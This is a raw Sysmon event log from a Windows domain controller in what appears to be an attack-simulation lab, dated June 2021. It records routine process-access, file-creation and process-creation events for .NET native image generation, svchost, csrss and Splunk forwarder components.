21:03:58.743{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BE-60D3-8603-00000000CF01}5048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000020479Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:58.743{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B95B92EED12CAC83A673EFBA37E43C69,SHA256=BE274109E99A30DD4EFAD3317666AA3A4E52C8403424B59508DF4E4D02CF396E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020478Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:58.727{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1BE-60D3-8603-00000000CF01}5048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020477Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:58.727{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BE-60D3-8603-00000000CF01}5048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020476Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:58.555{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BE-60D3-8503-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020475Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:58.539{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1BE-60D3-8503-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020474Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:58.539{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BE-60D3-8503-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020473Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:58.508{4DB9351A-A1BE-60D3-8403-00000000CF01}6584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19b8-0\Microsoft.Management.Infrastructure.Native.dll2021-06-23 21:03:58.508 23542300x800000000000000020472Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:58.305{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CECEFE6068756AB30E061185C2AB6F0,SHA256=71282E5C9CD8259E7B308F99343A03DBC7B3A4A1F89957227CFCE9C1A90DE64D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020471Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:58.289{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BE-60D3-8403-00000000CF01}6584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020470Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:58.274{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1BE-60D3-8403-00000000CF01}6584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020469Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:58.274{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BE-60D3-8403-00000000CF01}6584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020468Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:58.180{4DB9351A-A1BD-60D3-8203-00000000CF01}54202096C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020467Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:58.133{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BE-60D3-8303-00000000CF01}1324C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020466Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:58.117{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1BE-60D3-8303-00000000CF01}1324C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020465Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:58.117{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BE-60D3-8303-00000000CF01}1324C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020464Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:58.070{4DB9351A-A1BD-60D3-8103-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\8b4-0\Microsoft.Management.Infrastructure.CimCmdlets.dll2021-06-23 21:03:58.070 10341000x800000000000000020489Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:59.695{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1BF-60D3-8703-00000000CF01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020488Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:59.695{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020487Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:59.695{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020486Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:59.695{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020485Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:59.695{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1BF-60D3-8703-00000000CF01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020484Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:59.695{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020483Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:59.695{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1BF-60D3-8703-00000000CF01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000020482Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:59.696{4DB9351A-A1BF-60D3-8703-00000000CF01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000020481Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:59.305{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43DC98C5EC4D1F38794CB1818AD35DB0,SHA256=972F4448938784B6F0C317BD965A2EBEADCDCB249CBE58149E7573EC400B2BDF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020508Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.961{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1C0-60D3-8C03-00000000CF01}7020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020507Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.961{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C0-60D3-8C03-00000000CF01}7020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\F